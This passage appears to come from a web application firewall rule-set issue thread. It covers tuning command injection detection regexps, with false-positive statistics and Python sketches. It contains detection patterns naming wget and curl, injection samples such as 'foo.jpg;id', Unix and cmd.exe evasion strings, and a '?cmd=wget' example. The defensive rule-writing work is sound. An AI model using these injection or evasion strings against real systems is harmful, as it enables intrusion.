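# Stand-in for the large rule regexp; the real one is far longer.
BIG_REGEX = re.compile(r"[;&|{\r\n]\s*(?:wget|curl|id)\b")

def is_suspicious(value):
    """Run the expensive regexp only if a cheap character scan finds a trigger."""
    if TRIGGER_CHARS.isdisjoint(value):
        return False   # fast path: no injection marker present
    return BIG_REGEX.search(value) is not None

print(is_suspicious("orderby=id"))   # False (skipped by the pre-check)
print(is_suspicious("foo.jpg;id"))   # True
print(is_suspicious("a;b"))          # False (pre-check passed, regexp still ran)
```

The last call shows the worst case: the input pays for both the scan and the regexp, which is why the pre-check is not guaranteed to help.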

I've made some more improvements to the rules. I lowered FP a lot on the Reddit dataset by excluding some common English terms, and narrowed the regexps a bit.

Changes in v0.5:

Unix: removed for (163 hits; make this a specialized rule), which (79 hits), type (32 hits), cd (22 hits), open (6 hits), help (6 hits)
Windows: removed for (681 hits; specialized rule), oh (570 hits), now (559 hits), while (214 hits), cd (23 hits), title (12 hits), global (12 hits), help (11 hits), soon (5 hits), clear (5 hits), color (4 hits), choice (4 hits)
Windows: removed && || $( $(( ${ <( >( var=foo sequences from preamble since these are Unix shell specific
Unix: caught evasions with \ in path name, like ;\/\b\i\n\/\l\s
Windows: caught @ , based evasions like |@,,@,,@@,@@@,@@@@@@,(@@@, @@@ ,@, @,@(@ @@,@ @(@, @"c":\windows\system32\c^m^d.exe)))

False positive rates on Reddit comments:

The changes improved FP by a lot, most of which was caused by removal of English words.

Comparison with other approaches:

Variant	RCE coverage	False positives
CRS3 without RCE rules	none	2.3%
"Before" situation using pmf	301 unix/win, injection + case	35.6%
v0: Assembled regexps	267 unix+384 win, injection + case + direct	8.5%
v0.1: Check only inject char	267 unix+384 win, injection + case	5.3%
v0.2: Unix case-sensitive	267 unix+384 win, injection	4.8%
v0.5: Improved Unix case-sensitive	269 unix+373 win, injection	3.2%

Rule hits out of 126320 requests:

Rule ID	Hits	Explanation
`932100`	433	Remote Command Execution: Unix command injection
`932110`	1023	Remote Command Execution: Windows Command Injection

So the FP is now only about 1.1 percentage points over the CRS3 base rate. When a user excludes the Windows rule, there are even just 433 Unix rule hits (0.3%) on 126k comments.
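The hit ratios can be checked with a short Python calculation. It uses the hit counts from the tables in this thread and assumes, for simplicity, that every rule hit belongs to a different request, which the data above does not confirm.

```python
TOTAL_REQUESTS = 126320
hits_pmf = 44203                  # rule 932100 with pmf (before)
hits_unix, hits_win = 433, 1023   # rules 932100 and 932110 in v0.5

unix_share = hits_unix / TOTAL_REQUESTS * 100
both_share = (hits_unix + hits_win) / TOTAL_REQUESTS * 100
reduction = (1 - (hits_unix + hits_win) / hits_pmf) * 100

print(f"Unix only: {unix_share:.2f}%")         # Unix only: 0.34%
print(f"Unix + Windows: {both_share:.2f}%")    # Unix + Windows: 1.15%
print(f"Reduction vs pmf: {reduction:.1f}%")   # Reduction vs pmf: 96.7%
```

These are rule hits per request, so they are not directly comparable to the per-request false positive rates of the whole rule set in the table.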

By the way, I also noticed that quite a few Reddit comments actually contain shell commands. So these numbers are an upper bound. That said, these rules will definitely cause some FP in practice, no doubt.

Command injection FP is now lowered by around 97% when compared to the pmf rule. That looks like an acceptable rate to me for 3.0.0, and we didn't even have to remove too many keywords. The only compromises perhaps are the removal of the cd and which commands, which allow an attacker to do some discovery of existing directories (through returned errors) and executables. The for command will have to be mitigated with a special rule though, since a for loop provides full execution.

What's next:

Next I'll try to add some additional smaller rules to catch special for cases (for is a notable command for Unix and Windows, but causes most FP in the normal word list). If time is left, also subshells and some Windows/Powershell stuff.

You can follow the progress in my rce-regexp-v0 branch.

I would very much appreciate review of the regexps and tests, especially the Windows ones. I haven't used Windows in 10 years, so it's very likely that I am missing some stuff.

Here you can find the command injection tests I am currently using. I have no failing tests at this point. I really wish to add more, especially for Windows. If you have any access to Windows researchers, please ask them to look for more stuff and send me more obscure cmd/powershell syntax. This is the time to do it -- In three weeks the regexp will be out of my mind and it will be harder to edit it again.

Large update to the rce-regexp-v0 branch.

Unix coverage is improved a lot. I read a bash manual and added lots of bash/csh/sh keywords usable for execution and exfiltration. I improved the regexp against some possible evasions. This bigger keyword coverage is offset by stricter parsing of variable declarations. In total, FP has been lowered. FP is especially improved for content containing URLs with query strings, which tended to trigger annoying false positives in the earlier version.

For Windows, I have added a pmf data file with PowerShell commands, cmdlets and common strings. This rule amazingly produced 0 FPs on the Reddit dataset, which is pretty funny; I guess nobody talked about PowerShell in 2007. But it's a good sign that normal conversation is unlikely to trigger this rule.
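For readers unfamiliar with pmf-style matching, here is a minimal Python sketch of case-insensitive phrase matching against a word list. The phrase list is a tiny hypothetical sample, not the contents of the actual data file, and the function name `phrase_hits` is made up for illustration. ModSecurity's own matcher is implemented differently; this only shows the behaviour.

```python
# Hypothetical sample of PowerShell-related phrases.
# The real data file is much larger and its contents differ.
POWERSHELL_PHRASES = [
    "invoke-expression",
    "get-childitem",
    "new-object",
    "powershell.exe",
]


def phrase_hits(value, phrases=POWERSHELL_PHRASES):
    """Return every phrase that occurs anywhere in value, ignoring case."""
    lowered = value.lower()
    return [p for p in phrases if p in lowered]


# A payload-like value versus ordinary conversation.
print(phrase_hits("cmd=PowerShell.exe -c Invoke-Expression $x"))
print(phrase_hits("I went to the shell station to get gas"))
```

Because the phrases are long and specific, ordinary text rarely contains them, which is consistent with the 0 hits reported above.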

See the tests for examples.

I measured the performance of a pre-check on special characters. It made no difference.
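The kind of pre-check meant here can be sketched in Python as follows. This shows the idea only and does not reproduce the measurement. The regexp is a small hypothetical stand-in for the real rule, and the set of special characters is an assumption.

```python
import re

# Hypothetical stand-in for the much larger rule regexp: a special
# character, optional whitespace, then a known command name.
EXPENSIVE_RE = re.compile(r"[;|&`\n(]\s*(?:wget|curl|cat|ls)\b")

# Characters assumed (for this sketch) to be required by any match.
SPECIAL_CHARS = frozenset(";|&`\n(")


def matches_with_precheck(value):
    """Run the regexp only if the value contains a special character."""
    # Cheap scan first: no special character means no possible match.
    if SPECIAL_CHARS.isdisjoint(value):
        return False
    return EXPENSIVE_RE.search(value) is not None
```

The pre-check never changes the result in this sketch, because every match of the regexp starts with one of the special characters. It can only save time, and only if the regexp engine is not already rejecting such inputs quickly.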

Commix payloads seem to be covered, although this is more by chance -- I still want to have a specialized rule for the `for` and `if` commands on Windows. They give huge FP when included in the word list, but they are very important for scripting.

Rule hits out of 126320 requests:

Rule ID	Hits	Explanation
`932100`	428	Remote Command Execution: Unix Command Injection
`932110`	1023	Remote Command Execution: Windows Command Injection
`932120`	0	Remote Command Execution: Windows PowerShell Command Found

With injection checking, 3.2% of requests still have rule hits, compared to 2.3% for CRS3 without these rules.

My RCE branch has been updated. Most importantly:

Improved false negatives somewhat
Added rule 932130 to catch Unix shell expressions: $(foo), ${foo}, <(foo), >(foo), $((foo)). I didn't include backtick substitution (`foo`) because it hit many FP; however, known commands after any of these markers are still detected by rule 932100.
Added rule 932140 to catch Windows IF/FOR commands, for example:

FOR              %a IN (set) DO
FOR /D           %a IN (dirs) DO
FOR /F "options" %a IN (text|"text") DO
FOR /L           %a IN (start,step,end) DO
FOR /R C:\dir    %A IN (set) DO
IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n
IF [/I] [NOT] item1==item2
IF [/I] [NOT] item1   [EQU|NEQ|LSS|LEQ|GTR|GEQ] item2
IF [/I] [NOT] (item1) [EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2)
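The shell expression markers and FOR/IF forms listed above can be approximated with a few regular expressions. The following Python sketch is an illustration under simplifying assumptions, not the regexps used in rules 932130 and 932140. All pattern and function names are hypothetical.

```python
import re

# Opening markers of the Unix shell expressions $(foo), ${foo}, <(foo),
# >(foo) and $((foo)). Simplification: only the opening marker is matched.
UNIX_SHELL_EXPR = re.compile(r"\$\(|\$\{|<\(|>\(")

# Windows FOR: optional switch (/D, /F, /L, /R) with an optional argument,
# then a %variable, then IN followed by an opening parenthesis.
WINDOWS_FOR = re.compile(
    r"\bfor\s+(?:/[dflr]\s*\S*\s+)?%+\w+\s+in\s*\(",
    re.IGNORECASE,
)

# Windows IF: optional /I and NOT, then either a test keyword, an ==
# comparison, or one of the comparison operators (EQU, NEQ, ...).
WINDOWS_IF = re.compile(
    r"\bif\s+(?:/i\s+)?(?:not\s+)?"
    r"(?:(?:exist|defined|errorlevel|cmdextversion)\s+\S"
    r"|\S+\s*==\s*\S"
    r"|\S+\s+(?:equ|neq|lss|leq|gtr|geq)\s+\S)",
    re.IGNORECASE,
)


def classify(value):
    """Return the names of the sketch patterns that match value."""
    patterns = {
        "unix_shell_expr": UNIX_SHELL_EXPR,
        "windows_for": WINDOWS_FOR,
        "windows_if": WINDOWS_IF,
    }
    return [name for name, rx in patterns.items() if rx.search(value)]


print(classify("x=$(id)"))
print(classify("FOR /L %a IN (1,1,5) DO echo %a"))
print(classify("IF NOT EXIST c:\\temp\\x.txt echo missing"))
print(classify("for example, in (some) cases"))
```

Requiring the `%variable` and the `IN (` part is what keeps ordinary sentences containing "for" from matching. The IF pattern is looser, so phrases like "if defined properly" would still match, which is the kind of residual FP one would expect from IF checking.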

Rule hits on Reddit dataset:

Out of 126320 requests, hits are still at 3.2% with injection checking, compared to 2.3% for CRS3 without these rules. Only a modest number of hits has been added by rules 932130-932140, mostly from people talking about code. IF checking added a very small amount of FP, but it's low enough that I prefer not to make the rule more complex.

Rule ID	Hits	Explanation
`932100`	428	Remote Command Execution: Unix Command Injection
`932110`	1023	Remote Command Execution: Windows Command Injection
`932120`	0	Remote Command Execution: Windows PowerShell Command Found
`932130`	15	Remote Command Execution: Unix Shell Expression Found
`932140`	27	Remote Command Execution: Windows FOR/IF Command Found

Tests are here. I think I'm almost done for PL1.

Another update and hopefully the last one.

Most importantly, I've added rule 932150, which blocks direct Unix remote command execution (e.g. ?cmd=wget www.example.com). The command list of this rule has been restricted, and I require whitespace (denoting command parameters) or a command separator character after the command. So posting the string `wget` (but nothing else) as a parameter is legal. This approach seems to give an acceptably low amount of FP, with at least some protection.
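A minimal Python sketch of this matching logic, assuming the command must appear at the start of the parameter value. The command list and the set of separator characters below are hypothetical and much smaller than whatever the rule actually uses.

```python
import re

# Hypothetical short command list; the rule's real list differs.
COMMANDS = ["wget", "curl", "sh", "bash", "nc"]

# A command at the start of the value, followed by whitespace or a
# command separator. The separator set here is an assumption.
DIRECT_CMD = re.compile(
    r"^\s*(?:" + "|".join(map(re.escape, COMMANDS)) + r")[\s;|&<>]",
    re.IGNORECASE,
)


def is_direct_command(value):
    """True if value looks like a command followed by arguments or a separator."""
    return DIRECT_CMD.search(value) is not None


print(is_direct_command("wget www.example.com"))  # command plus argument
print(is_direct_command("wget"))                  # bare word only
print(is_direct_command("shell company"))         # "sh" is only a prefix here
```

Requiring a trailing whitespace or separator character is what lets the bare word through, and it also avoids matching longer words that merely begin with a command name.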

Further I've done some cleanups to the regexps and word lists, and added comments to the rule file.

Reddit dataset metrics:

Of 126320 comments, still 3.2% have rule hits.

Rule ID	Hits	Explanation
`932100`	450	Remote Command Execution: Unix Command Injection
`932110`	1023	Remote Command Execution: Windows Command Injection
`932120`	0	Remote Command Execution: Windows PowerShell Command Found
`932130`	15	Remote Command Execution: Unix Shell Expression Found
`932140`	27	Remote Command Execution: Windows FOR/IF Command Found
`932150`	44	Remote Command Execution: Direct Unix Command Execution
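To put the table in proportion, the per-rule hit rates can be computed from the figures above. This is plain arithmetic on the reported numbers. Note that a single comment may trigger several rules, so the sum counts rule hits rather than distinct comments and is not directly comparable to the 3.2% figure.

```python
TOTAL_REQUESTS = 126320

# Hits per rule, copied from the table above.
HITS = {
    "932100": 450,
    "932110": 1023,
    "932120": 0,
    "932130": 15,
    "932140": 27,
    "932150": 44,
}


def hit_rate_percent(hits, total=TOTAL_REQUESTS):
    """Hits as a percentage of all requests in the dataset."""
    return 100.0 * hits / total


for rule_id, hits in HITS.items():
    print(f"{rule_id}: {hits:5d} hits = {hit_rate_percent(hits):.3f}%")

# Sum of rule hits, an upper bound on distinct comments hit by these rules.
total_hits = sum(HITS.values())
print(f"sum of rule hits: {total_hits} = {hit_rate_percent(total_hits):.2f}%")
```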

I'm now ready to create a PR. Here is REQUEST-32-APPLICATION-ATTACK-RCE.conf. Unless I get comments, this will be the base of the PR.

Closing this; any further discussion is in #430.
